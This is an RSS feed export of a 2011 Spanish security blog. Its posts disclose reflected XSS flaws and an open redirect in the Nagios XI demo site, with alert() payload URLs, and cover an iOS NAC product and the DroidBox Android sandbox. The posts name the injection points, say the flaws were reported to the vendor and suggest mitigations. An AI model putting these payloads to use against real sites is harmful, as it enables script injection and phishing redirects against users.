<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-5967737507322085400</atom:id><lastBuildDate>Tue, 19 Jul 2011 14:39:34 +0000</lastBuildDate><title>Pablo Ramirez Hoffmann</title><description /><link>http://pramirezh.blogspot.com/</link><managingEditor>noreply@blogger.com (Pablo Ramirez Hoffmann)</managingEditor><generator>Blogger</generator><openSearch:totalResults>60</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/blogspot/BYGOD" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="blogspot/bygod" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">blogspot/BYGOD</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-3656367835162893053</guid><pubDate>Tue, 19 Jul 2011 14:39:00 +0000</pubDate><atom:updated>2011-07-19T10:39:34.440-04:00</atom:updated><title /><description>&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;Bug: XSS&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2824%29;%3C/script%3E&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;http://nagioxi.demos.nagios.com/nagioxi (Search Field)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=hostgroups&amp;amp;hostgroup=all&amp;amp;style=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=services&amp;amp;hoststatustypes=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E&amp;amp;servicestatustypes=28&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?&amp;amp;show=services&amp;amp;servicetatusty pes=0&amp;amp;hoststatustypes=12&amp;amp;hostattr=”&lt;script&gt;
alert(23);
&lt;/script&gt;”&lt;script&gt;
alert(23);
&lt;/script&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-3656367835162893053?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/bug-xss-httpnagiosxi.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-6535599565504222988</guid><pubDate>Tue, 19 Jul 2011 14:26:00 +0000</pubDate><atom:updated>2011-07-19T10:28:29.832-04:00</atom:updated><title>XSS en Nagios XI más BonusTrack</title><description>&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;b&gt;Con Bonus Track:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://3.bp.blogspot.com/-l8E-btKDkUs/TiWTXCNYy9I/AAAAAAAAAOY/Kh0so_RkFLc/s1600/xss_blogspot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="110" src="http://3.bp.blogspot.com/-l8E-btKDkUs/TiWTXCNYy9I/AAAAAAAAAOY/Kh0so_RkFLc/s320/xss_blogspot.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;Al hacer "Vista Previa" del post, sale este mensaje en www.blogger.com... y para los que entiendan, sabrán a los que me refiero.&lt;/span&gt;&lt;/div&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Como en todo software opensource, existe la versión enterprise, que en el caso de Nagios se denomina Nagios XI. En este post vamos a ver algunos fallos de seguridad que ya han sido notificados al equipo de desarrollo de esta herramienta y en la nueva release dejaran de estar, afortunadamente. Vamos a comenzar a buscar posibles puntos de fallo, para lo que usaremos la demo que podemos visitar en su sitio web: &lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="color: blue;"&gt;&lt;a href="http://nagiosxi.demos.nagios.com/"&gt;&lt;span style="color: blue; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;http://nagiosxi.demos.nagios.com/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Una de las cosas que me pareció curiosa, es que esta versión de Nagios usa URLs limpias, por lo que podríamos decir que oculta las variables GET. No obstante, no por estar ocultas, estas variables dejan de existir, ya que si posicionamos el ratón sobre un enlace podremos ver como efectivamente los parámetros se pasan usando variables GET.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://1.bp.blogspot.com/-N-ZWXwex9L4/TiWSI6z8zsI/AAAAAAAAAN8/b2jz5t0BRek/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="155" src="http://1.bp.blogspot.com/-N-ZWXwex9L4/TiWSI6z8zsI/AAAAAAAAAN8/b2jz5t0BRek/s400/1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;En esta captura podemos ver como al hacer click sobre “&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;&lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;Hostgroup Summary&lt;/span&gt;&lt;/em&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;” la URL que nos muestra el navegador está limpia pero el direccionamiento se nutre de variables GET que podemos explotar del siguiente modo:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: 13px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://4.bp.blogspot.com/-Z8-KzxHQMbo/TiWSJcZc2UI/AAAAAAAAAOA/TPZ3VnRP5Yg/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="138" src="http://4.bp.blogspot.com/-Z8-KzxHQMbo/TiWSJcZc2UI/AAAAAAAAAOA/TPZ3VnRP5Yg/s400/2.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Como podemos observar lo único que se ha hecho ha sido copiar el enlace del link y modificar las variables GET para obtener un XSS. Cabe destacar que todas las variables GET de esta versión de Nagios XI son susceptibles a XSS. Existen otros campos capaces de recibir un ataque XSS como por ejemplo el campo “&lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;search&lt;/span&gt;&lt;/em&gt;”:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://2.bp.blogspot.com/-s3u5vblAU8Y/TiWSJw5_s4I/AAAAAAAAAOE/ege3Vs6cxBg/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://2.bp.blogspot.com/-s3u5vblAU8Y/TiWSJw5_s4I/AAAAAAAAAOE/ege3Vs6cxBg/s400/3.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;O también en otros campos de entrada como puede ser el de filtro de páginas:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://2.bp.blogspot.com/-yFPHp2FOApM/TiWSKeMuo4I/AAAAAAAAAOI/t3ymYgnJLB4/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://2.bp.blogspot.com/-yFPHp2FOApM/TiWSKeMuo4I/AAAAAAAAAOI/t3ymYgnJLB4/s400/4.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Cómo último ejemplo observaremos el campo “&lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;DashBoard Title&lt;/span&gt;&lt;/em&gt;”, que se ejecuta al previsualizar los distintos &lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;Dashboard&lt;/span&gt;&lt;/em&gt; que tenemos:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://1.bp.blogspot.com/-zcsV3lbm8ZY/TiWSLRzZVcI/AAAAAAAAAOM/d_4BJ-8Bnrc/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="186" src="http://1.bp.blogspot.com/-zcsV3lbm8ZY/TiWSLRzZVcI/AAAAAAAAAOM/d_4BJ-8Bnrc/s400/5.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://4.bp.blogspot.com/-eSXmJTaxy54/TiWSLvRIU7I/AAAAAAAAAOQ/phKFaWgh67M/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://4.bp.blogspot.com/-eSXmJTaxy54/TiWSLvRIU7I/AAAAAAAAAOQ/phKFaWgh67M/s400/6.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Cabe destacar que estos fallos se pueden corregir fácilmente filtrando todas las variables GET y campos de entrada que tengamos en la web utilizando para ello diversas funciones, que dependiendo del lenguaje varían. En php por ejemplo tenemos el caso del &lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;html_entities&lt;/span&gt;&lt;/em&gt; que nos puede ayudar en esta tarea.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;Existe otro fallo en Nagios XI el cual también ha sido informado al fabricante y en la siguiente release dejará de estar, al igual que los fallos comentados anteriormente. En este caso el fallo es un &lt;em&gt;&lt;span style="font-family: Calibri, sans-serif;"&gt;URL Redirect Abuse&lt;/span&gt;&lt;/em&gt;, que permitiría al atacante redirigir al usuario a una página maliciosa. Este fallo se encuentra en la siguiente URL:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black; font-family: Calibri, sans-serif; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://3.bp.blogspot.com/-TCmtci6NVGY/TiWSMYooAAI/AAAAAAAAAOU/tpSOL5I8Kvc/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="177" src="http://3.bp.blogspot.com/-TCmtci6NVGY/TiWSMYooAAI/AAAAAAAAAOU/tpSOL5I8Kvc/s400/7.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;Como se puede observar hemos insertado una página inofensiva como es Google como PoC, pero podriamos insertar cualquier otra página. Este fallo se puede mitigar filtrando la dirección que se le pasa, para evitar que nos redirijan a páginas no deseadas.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="background-color: white; font-size: 10pt;"&gt;RESUMEN:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;Bug: XSS&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;http://nagioxi.demos.nagios.com/nagioxi (Search Field)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=hostgroups&amp;amp;hostgroup=all&amp;amp;style=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=services&amp;amp;hoststatustypes=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E&amp;amp;servicestatustypes=28&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?&amp;amp;show=services&amp;amp;servicetatusty pes=0&amp;amp;hoststatustypes=12&amp;amp;hostattr=”&lt;script&gt;
alert(23);
&lt;/script&gt;”&lt;script&gt;
alert(23);
&lt;/script&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/ (Latest Alert)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;Bug: Redirect Abuse&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;&lt;a href="http://nagiosxi.demos.nagios.com/nagiosxi/admin/?xiwindow=http://www.google.es"&gt;&lt;span lang="EN-US"&gt;http://nagiosxi.demos.nagios.com/nagiosxi/admin/?xiwindow=http://www.google.es&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 10pt;"&gt;Fuente&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt;: &lt;a href="http://naxonez.wordpress.com/"&gt;http://naxonez.wordpress.com/&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-6535599565504222988?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/con-bonus-track-al-hacer-vista-previa.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-l8E-btKDkUs/TiWTXCNYy9I/AAAAAAAAAOY/Kh0so_RkFLc/s72-c/xss_blogspot.png" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-2643046639301562399</guid><pubDate>Tue, 19 Jul 2011 13:55:00 +0000</pubDate><atom:updated>2011-07-19T09:55:26.550-04:00</atom:updated><title>NAC para iPhone e iPad</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-size: 10.0pt;"&gt;&lt;a href="http://www.safenet-inc.com/"&gt;Safenet&lt;/a&gt; &lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10.0pt;"&gt;ha lanzado una nueva tecnología que permite el uso de &lt;a href="http://www.apple.com/es/iphone/"&gt;iPhones&lt;/a&gt; e &lt;a href="http://www.apple.com/es/iphone/"&gt;iPads&lt;/a&gt; de Apple ampliando control de acceso a red seguro (&lt;a href="http://en.wikipedia.org/wiki/Network_Access_Control"&gt;NAC&lt;/a&gt;), ampliando su plataforma de autenticación a los dispositivos con sistema operativo iOS.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt;"&gt;&lt;a href="http://www.safenet-inc.com/About/NewsMedia/Detail.aspx?id=8589944098&amp;amp;terms=iphone"&gt;Según Safenet, su nuevo software de seguridad para iPhones e iPads&lt;/a&gt; forma parte del entorno de autenticación y de los centros y del entorno de gestión de autenticación de la compañía, permitiendo así a los usuarios securizar y auditar el acceso a los recursos corporativos vía móvil.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt;"&gt;Los portavoces de la compañía aseguran que, integrando la gestión de credenciales para dispositivos móviles en una plataforma de autenticación unificada, las empresas pueden confiar en que únicamente los usuarios autorizados tienen acceso a sus redes y recursos corporativos.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt;"&gt;Aunque más de una empresa ofrece ya aplicaciones de autenticación token basada en software para el iPhone y el iPad, esta es la primera vez que se ha llevado un entorno NAC a los tablets e iPhones.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt;"&gt;Según &lt;a href="http://www.linkedin.com/in/lawrencepingree"&gt;Laurence Pingree&lt;/a&gt;, la nueva oferta de Safenet resulta especialmente atractiva para las organizaciones teniendo en cuenta que “el acceso a los datos corporativos valiosos desde dispositivos que a veces son incluso desconocidos, genera un enorme riesgo para la seguridad”.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-2643046639301562399?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/nac-para-iphone-e-ipad.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-5075801457422718645</guid><pubDate>Mon, 18 Jul 2011 14:45:00 +0000</pubDate><atom:updated>2011-07-18T20:43:56.387-04:00</atom:updated><title>SandBox para Android</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;El aumento de aplicaciones maliciosas que han ido apareciendo para Android, (no solo en "markets" alternativos, sino también en el oficial) ha motivado la creación de la primera sandbox para Android.&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Una &lt;a href="http://es.wikipedia.org/wiki/Sandbox"&gt;sandbox&lt;/a&gt; permite recrear un escenario virtual seguro donde analizar las aplicaciones de forma dinámica, pudiendo detectar las acciones que realiza a distintos niveles y registrándolas para un análisis más en profundidad. Existen desde hace mucho para PC. Organizaciones públicas y privadas permiten el envío de un fichero y se devuelve un informe de su actividad.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;La virtualización ha permitido facilitar mucho el proceso, aunque también los atacantes han sabido aprovecharse de esta circunstancia. Buena parte del malware de PC actual sabe detectar si se encuentra en un entorno virtual o en una sandbox y puede o bien no ejecutarse o bien modificar su comportamiento. Con esto dificultan su estudio.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Aunque ya existían algunas sandbox privadas para Android, el proyecto HoneyNet supone la primera sandbox gratuita por todo el que quiera montar su propio laboratorio en casa. La versión actual es alfa, lo que implica que, aunque inmadura, es funcional.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;DroidBox, como ha sido bautizada, hace uso de TaintDroid, un proyecto para la monitorización en tiempo real creado por varias universidades estadounidenses e Intel. Por ahora, DrodiBox crea un informe tras la ejecución de una aplicación que devuelve la siguiente información:&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;Operaciones de lectura y escritura de ficheros&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;La actividad de las API criptográficas&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;Conexiones de redes abiertas&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;Salida de tráfico&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;Fuga de información a través de ficheros SMS, o redes&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;Intentos de envío de SMS&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10pt;"&gt;Llamadas realizadas.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10pt;"&gt;Más información:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;HoneyNet :&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="color: black; font-size: 10pt;"&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;a href="http://www.honeynet.org/node/744" target="_blank"&gt;&lt;span style="color: #114170;"&gt;http://www.honeynet.org/node/744&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;b&gt;Google Code:&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;span class="apple-style-span"&gt;&lt;a href="http://code.google.com/p/droidbox/" target="_blank"&gt;&lt;span style="color: #114170;"&gt;http://code.google.com/p/droidbox/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
